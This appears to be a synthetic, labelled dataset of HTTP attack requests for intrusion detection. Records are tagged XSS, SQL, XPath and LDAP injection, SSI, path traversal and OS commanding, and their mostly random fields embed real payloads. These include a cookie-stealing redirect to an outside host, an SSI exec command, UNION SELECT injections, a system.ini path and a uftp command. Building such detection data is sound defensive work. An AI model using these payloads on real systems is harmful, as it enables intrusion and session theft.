If-Modified-Since: Mon, 25 Sep 06 13:36:58 CET
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 10 May 04 05:39:10 UTC
Max-Forwards: 2
MIME-Version: 8.4
Pragma: nmaynthe=enrHlq
Proxy-Authorization: 2bktt i6so=2edOr
Authorization: e6tHu E5egen=haLqjtn
Range: 965978-,-986,-07275
Referer: http://bhkuht5E.cz/uihW/tettS.mpeg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 6.5; hd-ur; rv:5.2.2) Gecko/99497922
UA-CPU: StrongARM
UA-Disp: 3440,7675,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 2.4 www.komsytl.gif, HTTP/8.9 www.P8csToo.gif:99922, HTTP/7.0 www.ro3ee.png
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44935
Start - Id: 47735
class: XSS
GET /kkm5/29x8OKPm/2IDE@Rxd/hIA6ncspt0baB/oeg9nAj7riit/t_pxFLfbJ/r4sssodreetlt/Vk.homeOHXt1/yTqWJSKTjnRr1ILxDQ/oKOa/rIte3todd/j4@E1d-y.jpeg?eiq=%26%7B%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ng.com%2Fcgi-bin%2Farde.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B HTTP/1.1
Host: 119.46.248.44
Connection: keep-alive
Accept: image/jpeg;q=0.3
Accept-Charset: euc-cn
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=97
Client-ip: 99.41.111.184
Cookie: ewai=opunbhm;oyHrthedI=mn'ialn0emsds1;eYi3=nepOSlQw;cysilMrocgt00=naSTjk
Cookie2: $Version="054"
Date: Sat, 24 Apr 04 20:31:13 UTC
ETag: "5T3Rz7Rc1UrCuOe2gb"
Expect: asn70
From: rlNe@ecetad6.fr
If-Modified-Since: Tue, 27 Apr 10 12:29:21 UTC
If-Unmodified-Since: Fri, 20 Aug 04 18:14:39 UTC
If-Match: "gRSWTVcGBjnhRXC8X"
If-None-Match: *
If-Range: *
Max-Forwards: 6076
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest uri=http://spfa.biz/mzembeOq/usguCen/etlmac.exe
Range: 9-,057-2,501963-763
Referer: http://dtfUmsho.de/oasaq/asa0eye/feraD/pifue.mp3
TE: chunked
Trailer: Date
User-Agent: Mozilla/4.6 (X11; U; Solaris 4.7; gr-iL; rv:9.2.0) Gecko/40901425
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 2.8 9.132.188.193:3, FTP/1.7 140.100.115.49
Transfer-Encoding: gzip
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 147.116.190.16
X-Serial-Number: 399335844567
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47735
Start - Id: 50108
class: XPathInjection
PUT /LiframeblZ5kdocumentv/hTtReOnflwyHqph6ktA/5XSL5pnl6.png? HTTP/1.0
Content-Length: 233
Content-Language: mfunasae
Content-Encoding: gzip
Content-MD5: NWJ2ZWF0bUFxY29zdG9haA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 09 Nov 08 14:56:23 UTC
Host: www.ngovaskn.de
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.5, euc-kr;q=0.8, x-mac-arabic, windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Cookie: 5PyN=[t<L ;YEfEzT=15799     or  T/r/sn8cs/child::node()[position()=146] or  1017=;idw0reae6=23
Cookie2: $Version="0"
Date: Sat, 24 Nov 07 20:19:15 GMT
If-Modified-Since: Fri, 13 Apr 07 03:34:35 GMT
If-Unmodified-Since: Tue, 06 Oct 09 03:02:27 GMT
If-Match: *
If-None-Match: "vORrylrKKgA7mE9Pyi"
If-Range: Tue, 16 Sep 08 21:35:33 UTC
Max-Forwards: 7
Pragma: oameuo=sxig6ui
Referer: http://edOM.fr/miat2Mt/eroeR/e9hl.sh
Trailer: From
User-Agent: Mozilla/4.5 (compatible; Konqueror/0.2; Windows NT; JVoge; 4aroeh5u; wonehao5e)
UA-Disp: 9729,4869,32
Via: 9.5 203.32.225.79
Transfer-Encoding: gzip
Warning: 212 53.139.159.27 "triyogjsloIpo" "Sat, 11 Dec 04 17:13:36 UTC"

a1sohgi=0_dBEQ&s2mariNto9e=ooaE&6aHoaa=otGol-Is8r&anlrtednr9eo=nchlIoeahsr0sih&0tcehu9ssm00=tc3ociln3&U.OPbObuG=rvardnlrt71wra<hnstyleopassthru;j&sd=leopDuV&epigsioyar=ok6TKPkvT&tnfpir=;0rgehttpreBhnKabr;h&h9qgngalory2n=neu 2

End - Id: 50108
Start - Id: 39184
class: SSI
PUT /ggsYgqDerZTG/ssnL@nt0qSMChcUXSF@/yH/rQl-25hLFUXBbc/oDnlRWLtscW1NW62.RrY.jpeg? HTTP/1.1
Content-Length: 340
Content-Language: eieaNOa
Content-Encoding: compress
Content-Location: http://mhfoe.net/ietdn2n/eolI3tha/iWftn/pgtfd4t.cfm
Content-MD5: YmVBaWVzMXRlcmRvbTlqaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:04:18 GMT
Last-Modified: Fri, 07 Jul 06 05:59:18 GMT
Host: 117.153.175.70
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 148.41.215.213
Cookie: 83riEen=e objectx5imretni;5Qiframef4DjOm=ch1h;ede=nLrK;t7vles0trxn72=ulN@jaQwMbDH
Cookie2: $Version="261"
Date: Mon, 09 Aug 04 07:40:30 CET
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
From: usoekn@3fnpm.it
If-Modified-Since: Fri, 13 Feb 04 08:42:47 CET
If-Unmodified-Since: Mon, 20 Nov 06 22:22:52 GMT
If-Match: "0O28l0PxkqucuFPD"
If-None-Match: "utzZOFj.idzt6x4iPjC"
If-Range: Mon, 19 Dec 05 02:18:24 GMT
Max-Forwards: 0
MIME-Version: 4.8
Pragma: gelaM='toifs'
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Digest response="560Bec53720bDF014BF8caFdef03FDe5"
Range: -4,-09852,71-
Referer: /7rqdo/gpnRlYm.swf
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Unmodified-Since
User-Agent: 5hspr0k3sry2pssnva
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: 6.1 146.14.85.104, HTTP/0.2 www.7em6i.png, 7.6 www.ets5i.gif
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~

0utthsgsedlsmng=<!--#email fromhost="www.hddrKle.com" tohost="mailbox.rrfe.com" message="da3a kDeuaZ 7n al2" fromaddress="hLpT8q.com" toaddress="sndbA.5h.com" subject="di" sender="laCj.com" replyto="oMn8iiA.com" cc="dte" inreplyto="an wmoE slimo8" id="twNSomail" -->

End - Id: 39184
Start - Id: 49082
class: XPathInjection
GET /cZZhglMQD_Jk/o9I5oc3hOKrDJfoN-/Nw@/OBF6wUr/ovQPFFNYRetcz/1aensc8s0hztneir/xZzEMAR2lfg/cmd9UJV.css?%uL-ajO@saWl=7006&2mihey=0ae&c6p=883&xBUewnR=e&upHgGftpselectroV=8260689&CsrGti=lfesg%27%5D+%7C++++P+++++%7C+++++%2F%2Fuser%5B+++++name%2Ftext%28%29+++%3D+++%27gsne&4rse0Ifhs=pcpcro+eYlscea%3Benetrl&eerv6alrrii=73620139&SR4musrY6=gb&NifLweQa=0htpasssuew1&eavgo1iecRy3=t_1GvEj%40oX&viCjnh=a%40uZ_Fa&k6hfqoiAiTkep1=at-uh+Tm&dm=%3AtanN&od7raAi=a4-7e_PLUj7Q HTTP/1.0
Host: www.8dttqtt.org:345
Connection: oo1e
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lvyeDw-ray2t;q=0.7, jstaat-n;q=0.1
Cache-Control: min-fresh=66324
Client-ip: 111.104.86.65
Cookie: efreameasgswst=94;ianesZnalds=y8dbrAhmEHt;fa1gpyewd6Epav=ossddchoai;h6fr7os3eNaadth=iZmH5;c6i=3dna;sbd7maAhm='7
Cookie2: $Version="155"
Date: Sat, 10 Jan 09 21:18:00 GMT
ETag: W/"A619wF0sDd52IAUn"
Expect: 100-continue
From: eynba@e3yzoc.com
If-Modified-Since: Wed, 10 May 06 15:03:51 GMT
If-Unmodified-Since: Fri, 08 Apr 05 16:50:47 GMT
If-Match: *
If-None-Match: *
If-Range: "d0f0VF0rTPq0r9j5lP"
Max-Forwards: 253
MIME-Version: 0.4
Pragma: ny='I4sjtss'
Proxy-Authorization: Digest username="tlens"
Authorization: Digest response="6d8bAaE6f650960BAfD0fAf6b4e0c99d"
Range: -39415,-80233
Referer: http://eNelul.ch/senaoaeu/ej0nt9ho/hRlmhraD.js
TE: deflate
Trailer: Date
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 8.6; sh-Pt; rv:3.3.6) Gecko/48932955
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: HTTP/8.5 www.ntdlpi.png, HTTP/0.6 120.127.90.39, ace/7.6 www.eeqU.gif
Transfer-Encoding: deflate
Upgrade: siCoh/9.4, oa5/4.0, n2t/8.5, daet/0.5
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 43.74.174.24
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49082
Start - Id: 37285
class: LdapInjection
POST /.SBYtXE/tGZ7/1jUoDn2Up.E4g/DiMI-75/f5si4E0/ekoZWGazoPLQIsqz4pW/r2@Xztltv3I0x/altn0na/id6aeFwplomtolIgnv/reljfntbemhGqftval6.php? HTTP/1.1
Content-Length: 110
Content-Language: a
Content-Encoding: compress
Content-MD5: dlNydGFhN2VzblR0N3R5cA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Sep 07 17:55:45 UTC
Host: 33.106.145.216
Connection: close
Accept-Charset: *;q=0.5
Accept-Encoding: oDzu)(|  (Rneoc=*)
Accept-Language: 847)(&(objectClass=onO)(|(sn   =   in)(cn=omsh   J*))
Cache-Control: no-transform
Client-ip: 51.69.186.162
Cookie: oryiefocBPe5nv=9397445;er8eee=S7Na)ee
Date: Fri, 11 Dec 09 20:21:42 UTC
ETag: "qd9agOySGbi2Gujjf4P"
If-Modified-Since: Tue, 01 Apr 08 03:45:57 UTC
If-Unmodified-Since: Sat, 21 Jul 07 13:35:12 UTC
If-Range: *
Max-Forwards: 42
MIME-Version: 7.1
Authorization: NTLM b2Nlc3duWTFlcjZhVHpvc2lIY2VlNW1lbVZzcm5oZTlldGVlemlkZmVlbm90NDJ0
Referer: http://eo1rd.st/wtOtg6ie/eOe8oCo.js
User-Agent: Mozilla/6.7 (Windows; U; Win98 2.2; tr-ra; rv:2.2.1) Gecko/25770143
Transfer-Encoding: fo9iH; peeAsTt=u0n35
X-Serial-Number: 0398688165007781

rlraeusGtBabi=461&mwpepe=hosrgsrs|+t&m5=g&XMVmusr=u md&e3s4toin9b=929565&1oEthnfd=726&ssr=a3nbt5osntZithoe

End - Id: 37285
Start - Id: 42195
class: SqlInjection
GET /OMsTXapemIAyqg/ChHorZTwg7_/5HfSk39eav/t3vi@3ZOh7U5Z/we0tea/nph-0dRDI5CfL./8pt4eO8R18nt4mtsg/bSgsV3tyE76/wHz0TeyUEiPfBVfFZ/9cfu.nB2i3xpXN6R.htm?BVi6N=332162&chfnteeaaEe=%27++%29+UNION+++++ALL++SELECT+++++kueasaRtrs+++FROM++ezA8+WHERE++%28+%27%27++++%3D++++%27&u0ft=4366292&YSRaostyleHpnUCI=+i+e6s%3Eldocumentui&mucteneoqn=oebed&ma36trtr=86943886 HTTP/1.0
Host: www.nh5essnL.be
Connection: close
Accept: image/png;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 139.139.72.242
Cookie: aeahhes88o3k=uw8XlA4@;xfiivhscs=7i ci;tu=htpass]htaccesnwihw3&&Otmns$c4e;looisa4hitp=anD
Cookie2: $Version="346"
Date: Sun, 10 May 09 24:43:27 UTC
ETag: W/"mDVvfRc_ydIMiZa"
Expect: 100-continue
From: bnR1@rhaYn.be
If-Modified-Since: Fri, 21 Oct 05 02:29:51 GMT
If-Unmodified-Since: Sat, 07 Feb 09 24:31:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7466
MIME-Version: 4.5
Pragma: e0='miaas'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nc=D9Efa2bf
Range: -3,97623-
Referer: /tbfsSu7.mdb
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.7 (compatible; oEgas7rmn7; Linux i586; vu2r5gA)
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: 1.4 213.47.0.114, HTTP/5.8 www.hseT.gif
Transfer-Encoding: gzip
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 52.218.75.150
X-Serial-Number: 746787770668949
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42195
Start - Id: 49457
class: XPathInjection
GET /P7https./scripttB4pCFN/Gjj5/tociteio9/meta-@IeVU3xp_PlY_-A/osexhRs21oae.php4?nwaaosq=tvrr&rOnoeeeaooani=lei%27%5D+%7C++++P+++%7C++%2F%2Fuser%5B+name%2Ftext%28%29+%3D%27ynjc HTTP/1.1
Host: 92.207.135.240
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip;q=0.6, gzip;q=0.4, deflate;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 5.36.126.231
Cookie: sGMhpOnlgto=boot.ininoc@pOTtndocument lx;utnqenbneceagao=asxtermssJ]hs:;tEhgs3ieggnne5=smlfmlaneh|erc0binfi;arueR=oW7j
Cookie2: $Version="817"
Date: Tue, 01 May 07 07:23:43 UTC
ETag: W/"kUU6QrCkb-GxGP.IGM"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Thu, 25 Dec 08 18:25:57 CET
If-Unmodified-Since: Sun, 13 Dec 09 23:43:14 UTC
If-Match: "vRcBu9hPH_EqJcU"
If-None-Match: *
If-Range: *
Max-Forwards: 876
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: rrse TEfia=s7duouae
Authorization: Digest qop=auth-int
Range: -012
Referer: http://eoeoeg.fr/snaimh/esotd/rwna/035itwl/ddSe.gz
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.1 (X11; U; SunOS sun4u 7.9; No-a3; rv:2.1.7) Gecko/27595575
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: identity
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49457
Start - Id: 45401
class: PathTransversal
POST /kFueOnJAf8N/goennd/Hvy-fwindow.openIsock_streamKphtpassscriptPJ.asp? HTTP/1.1
Content-Length: 180
Content-Language: oR
Content-Encoding: gzip
Content-Location: /fnnfl/ea5xScR/Xegd.htm
Content-MD5: d2VPVHNpYWVzYXRkbk9OYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Jul 05 04:50:15 GMT
Last-Modified: Fri, 23 May 08 18:19:55 GMT
Host: 228.77.123.85
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: omRlh-tznsSeee, 7ana-ghdQoBi;q=0.0, mEc3pw-teodd0, bXhsr-fet6Un
Cache-Control: min-fresh=4
Client-ip: 138.9.188.15
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Sun, 25 Jan 09 21:20:26 GMT
ETag: W/"-yfA6unXQjL3zd2"
Expect: ceauo
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "Ca7G-c1Fsah1tqkn"
If-None-Match: *
If-Range: Fri, 17 Oct 08 08:28:41 CET
Max-Forwards: 74
MIME-Version: 1.9
Pragma: g=eLdcnsm
Proxy-Authorization: qei4S 0e1e=mede
Authorization: Digest username="isysa"
Range: 96447-,026-322
Referer: /not6dYno/irdio/t9gpwoNe.php4
TE: trailers,deflate,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: mtMzT..Tv http://www.voie.st
UA-CPU: MIPS
UA-Disp: 088,174,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 5gamT/1.8 118.86.132.84, HTTP/4.3 253.95.173.116, ebtE/1.3 113.240.31.129
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 735 167.158.26.9:63108 "suudbN" "Wed, 11 Oct 06 14:19:30 GMT"
X-Forwarded-For: 32.85.66.113
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

secs=@http&wfwseEadhHnath=ohkQh&owefreeecoatlfa=bqOi_&ltrn8eenmoymuzi=634772&krh8riEht=erok&sai=\WINNT\system.ini&ecEbk3d=d9sD&pax=393526779&eeRte=wSht&3s26OtPhh=238&rHhr=097

End - Id: 45401
Start - Id: 46864
class: XSS
POST /eM2wXEpg/tuZ.swf? HTTP/1.0
Content-Length: 330
Content-Language: gla,9aef8
Content-Encoding: gzip
Content-Location: /0eheZdue/aNaoadot.swf
Content-MD5: U3NwZEdsVzlDbXJjc25zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Mar 04 16:45:32 UTC
Last-Modified: Sat, 20 May 06 12:06:28 UTC
Host: www.eseg.it:80
Connection: keep-alive
Accept: audio/*, image/png;q=0.6, application/postscript;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, gzip
Accept-Language: Csamle-7lnwd;q=0.1, oe-UteelhD9
Cache-Control: max-age=1
Client-ip: 152.154.47.47
Cookie: uEews1ip0su=735;ri=sK2.ys;EDX6iSA0E=eB.-VU-99
Cookie2: $Version="96"
Date: Fri, 13 Feb 04 11:00:25 GMT
ETag: "ynNtDqxUiypefBzDU"
Expect: ascq
From: Adtwe7be@o8Kit.ch
If-Modified-Since: Mon, 13 Dec 04 22:31:05 UTC
If-Unmodified-Since: Wed, 19 Jul 06 09:52:22 GMT
If-Match: *
If-None-Match: "jv56Az3Sc3EQbJ0KKv"
If-Range: Mon, 13 Sep 04 08:24:42 CET
Max-Forwards: 7
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Basic QXRJajphcDdwZUR0Zw==
Range: 6262-,10870-70169
Referer: /rttvra0/feeE/or6iwi/Siaa/egaotfwd.asmx
TE: deflate,gzip;q=0.3
Trailer: Referer
User-Agent: NwplEinil/0.3.5.9
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: HTTP/7.6 www.h4myes.jpeg
Transfer-Encoding: gzip
Upgrade: enf/4.8, aeoeoi/9.1, d2aRmj/2.6
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rno=451500058&o2jtmdfc=<meta http-equiv  =    "   refresh " content  =  "    0;url=javascript:   [alert ('em');] "    >&ay=eYEfrr&niwi=56&Gs=r/e umy lmmetach<?&ol9Slls9uenu=6&teecqsit=7$de&XzNwWNPNP=189&tmAnhO3rd1eb=iXVM.I&8T3Necayonnc61=elza&olsoetss=1717381&eoLlr6r3hu1zgjc=samlikel4e

End - Id: 46864
Start - Id: 40263
class: SSI
GET /ioR/g3qXSc/XLFwHN-Ld@f_lzc/y7woaB3ZTiaZClvhvjw/rrnotasx3sei1/i57rV3IOqr5NR-Z6k/tdhsnoehgidinlbe/ecoqEuzm/-JVru/tW7p34bGR.bin?UF9delete9=%3C%21--++++%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5CoNr%5C67iys2Tz%5Cmothei.exe+++++d%3A%5Cnwicant%5Cwww.setr.org%5Cl7htztte%5Cdatabase.mdb+%2Fx+exporttofoxpro%22--%3E&tdsphlde=636318&hr2=0eDhsp8unrgwsejjrn&nhlnslgc=950302471&u2omx=Tho1cn6+t5enhthiite%5B&cearnfeEr=522999&Gsaila=9&Upt8hexltz4ehnt=2899517&x3ADfbbmeta=72835&htdulteo=4032106&NxGF_M=+openNee HTTP/1.0
Host: 250.154.52.67
Connection: maadh1
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: o4zsa-irxuacbh;q=0.3, sa-u;q=0.7, b-pt;q=0.9
Cache-Control: no-cache
Client-ip: 140.72.125.191
Cookie: 7ehPeognOanh=46;7ta=36179;Qtil3Tcntvr=45317375;tiaxha=lw
Cookie2: $Version="4"
Date: Tue, 11 Aug 09 21:01:18 CET
ETag: W/"B6wSrN4YjC3rpPVq"
Expect: 100-continue
From: 7Aiet@9het.it
If-Modified-Since: Mon, 05 Oct 09 12:12:32 GMT
If-Match: *
If-None-Match: "al9Ci8aqrUkjFeBH"
If-Range: Mon, 16 Jun 08 04:16:03 GMT
Max-Forwards: 33
Pragma: B='rrcVae2'
Authorization: Basic Z1RvaWRtczY6b3NsZQ==
Referer: /gwiuHt/camwot/bE1i.pl
TE: trailers,trailers
Trailer: Authorization
User-Agent: ltUZDJQ http://www.abO99l.gov
UA-CPU: MIPS
UA-OS: Win95
Transfer-Encoding: rapc52
Upgrade: zebo/3.9
Warning: 071 204.81.227.195 "9otlof6hSoleearo2N" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40263
Start - Id: 36827
class: OsCommanding
GET /ECmbyURJoLo/boKpOxr7EZ17v/3jtcFR@0Rw.jXDOWr._K/OawacceptYQEN_styleQc/HbgTewm/15htcmzceamhoe/ahnoeiEmr/tBim.css?ow=7&gd=%27+++%3Buftp+++-g++%2Fhome%2Fasteto%2Fentaalseneie+++96.176.228.182+++%2Finicna%3B&lJnmlaBPosoej=bodyen&tisa5=chd%40vwTr%3EIe HTTP/1.0
Host: www.o1hiu.uk
Connection: zIrF
Accept: */*
Accept-Charset: iso-8859-1;q=0.3, x-mac-japanese, iso-8859-8;q=0.6
Accept-Encoding: *
Accept-Language: nkrce-ean;q=0.9
Cache-Control: no-store
Client-ip: 131.196.248.228
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="595"
Date: Tue, 07 Sep 04 19:47:25 UTC
ETag: W/".B6qBus1n1_mv6L"
Expect: txirnoe=mMPu;seI4y
From: aPre@Ehts2SDd.ch
If-Modified-Since: Thu, 26 Apr 07 19:53:05 CET
If-Unmodified-Since: Sun, 05 Mar 06 09:28:23 GMT
If-Match: "GwWeouVuOkSAbnVv"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 3.6
Pragma: me8t=dOx
Proxy-Authorization: iaejf6 xN9h=Rnvltnn
Authorization: feae0r rnat9e0n=aenga
Range: -95
Referer: http://www.qtgE.it/tryls/te8eUay/Ouphh/raBlderi/e3tplze.cfm
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.3 (compatible; rtdailnexk; Linux i386; m8p6m; 3f6cd3i)
UA-CPU: 68000
UA-Disp: 3174,538,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: INue/8.7 www.dtvlf.js
Transfer-Encoding: compress
Upgrade: miiht/0.4
Warning: 917 63.115.145.135 "Ohgd7" 
X-Serial-Number: 076281973736224985
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36827
Start - Id: 39280
class: SSI
GET /Gnxp_jmailexecuiAfwinntor/aa/f.lBG/O8Pn9telnet3likeiLy.u/i61nc/ia6wIPhbdBf7A.o4r9/e7t6VJCEJs/zellm/ijEcFsgG7IzlHF/oF92a.gif?iszmzsnr5esmSy=42&HTrkd=2146&execunullgtmp1y9w6=55690882&tPq=where%3B%27s%5Cre0%7Ctpasemo&EtwApzf4aeo=9c-union%24eeehe%3Enaore&yhyontdcedw=uPkgwdAwhl&iuTw=rphp&naYudhn=257&soeierobftce=2236&nTinnhgllii=ng8&anCi5Iecarh=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&db2sitoe=1ebr1saragwgtnl9aT&1vQlikei0I37KC=s0ioe&Ukuilrcef=2&S2i=%26am%29re3 HTTP/1.1
Host: 75.79.59.52
Connection: keep-alive
Accept: video/mpeg, text/plain;q=0.4, audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.8, compress, gzip;q=0.2, gzip;q=0.9, deflate;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 178.60.27.113
Cookie: ol=8e
Cookie2: $Version="22"
Date: Mon, 12 Jan 09 03:14:20 UTC
ETag: W/"v-YIcLdV9XLjfGY"
Expect: 100-continue
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Thu, 25 Nov 04 16:26:48 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Mar 04 02:49:47 GMT
Max-Forwards: 901
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Basic ZXVlZTQ6dG9oU2w=
Range: 3-
Referer: /i6lrpndy.js
TE: trailers
Trailer: Via
User-Agent: Mozilla/1.1 (X11; U; Solaris 3.4; zl-wa; rv:1.2.7) Gecko/02984202
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: tooar; ho4otdf=ihrn
Upgrade: dde/7.5
Warning: 372 www.exhwh.jpeg "h0t3bfwddlgralo9" "Thu, 10 Jun 04 17:14:38 UTC"
X-Forwarded-For: 190.235.131.102
X-Serial-Number: 420641623640
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39280
Start - Id: 42243
class: SqlInjection
GET /sftss4r/xDXJ3a4NjOTVt1m/e5newijaerselw/lj_/z9b.ZND/cZo8O/bVrsWdocumentK/7esMaQ/x1Ddih/6s0Pq/nc8sHee/kleya40VLrsjcp1f.bin?slndiprimr5heyx=x7rC6haaluorss&0ajn0hfeiN=+Ne+xtermiapnh%7Ecmetaeexec6nph-St&i3iiwyrtbhs=wdsnIb&deamoxsHAo=e8tb%26%24i4hosldd+usoei&ftniao=573389&nRiei0atm8heeh=nr9odzushht3&netcatnkzzSSGxdH=vsrsCede&frehewbpceui=lntiethuhl&esyifeisore=5Wdj%40u_lZ68L&bsbjhrehoEYhNwv=dEhm&zaabR6esstewyre=%27+++++%2F**%2F++++OR++++%2F**%2F%27%27++%3D+++%27&@libXHQD=ncohoaw&dF.0mp@AW=47023310&b1e0wnigoEyye=evtr+%27m0%3Bgandp&jr2tibgon=1ixot HTTP/1.0
Host: 244.70.136.217
Connection: close
Accept: text/xml;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 109.121.232.30
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Sun, 02 Jul 06 16:59:54 GMT
ETag: "AwZJ1R96_ZwyUkum"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Sat, 31 Jan 09 09:28:58 UTC
If-Unmodified-Since: Fri, 02 Dec 05 05:15:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
